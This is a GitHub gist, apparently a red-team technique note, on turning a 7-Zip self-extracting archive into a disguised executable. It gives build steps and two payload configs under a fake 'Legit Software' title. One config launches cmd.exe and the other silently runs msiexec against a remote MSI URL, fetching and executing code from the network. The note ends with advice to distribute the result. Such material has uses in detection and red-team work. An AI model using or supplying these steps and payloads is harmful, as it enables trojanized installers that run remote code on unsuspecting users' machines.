Skip to content

Instantly share code, notes, and snippets.

@keyboardcrunch

keyboardcrunch/7zip_sfx_proxy_execution.md

Last active April 7, 2023 00:36
Show Gist options
  • Save keyboardcrunch/9a1af62b7c05752e494c2cb6d398f897 to your computer and use it in GitHub Desktop.
Save keyboardcrunch/9a1af62b7c05752e494c2cb6d398f897 to your computer and use it in GitHub Desktop.
Download ZIP
7-zip SFX Payload
Raw
7zip_sfx_proxy_execution.md

Steps

  1. Download and install 7-Zip
  2. Download and extract the 7-zip extras.
  3. Create a payload build directory and copy the 7zS.sfx file from extras into it.
  4. Right-click and 7z archive your decoy payload, move it to a stand-alone payload build directory.
  5. Craft your payload and save it as config.txt (See payloads below, must be in UTF-8 format) within this payload build directory.
  6. With cmd.exe binary combine the files, copy /b 7zS.sfx + config.txt + decoy.7z sfx_payload.exe
  7. Distribute and test your sfx mayhem carefully.

Payloads

Command Execution

;!@Install@!UTF-8!
Title="Legit Software v1.2.3"
BeginPrompt="Ready to calculate?"
ExecuteFile="cmd.exe"
ExecuteParameters="/c calc"
;!@InstallEnd@!

Remote MSI Execution

;!@Install@!UTF-8!
Title="Legit Software v1.2.3"
ExecuteFile="msiexec.exe"
ExecuteParameters="/i https://example.com/kbc/sketchy.msi /qn"
Progress=no
;!@InstallEnd@!

Notes

  • The 7z compressed decoy payload cannot be password protected but you could put a password protected archive within it and use ExecuteFile or RunProgram (with the Directory variable) parameters to then open the password protected archive.

Resources

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment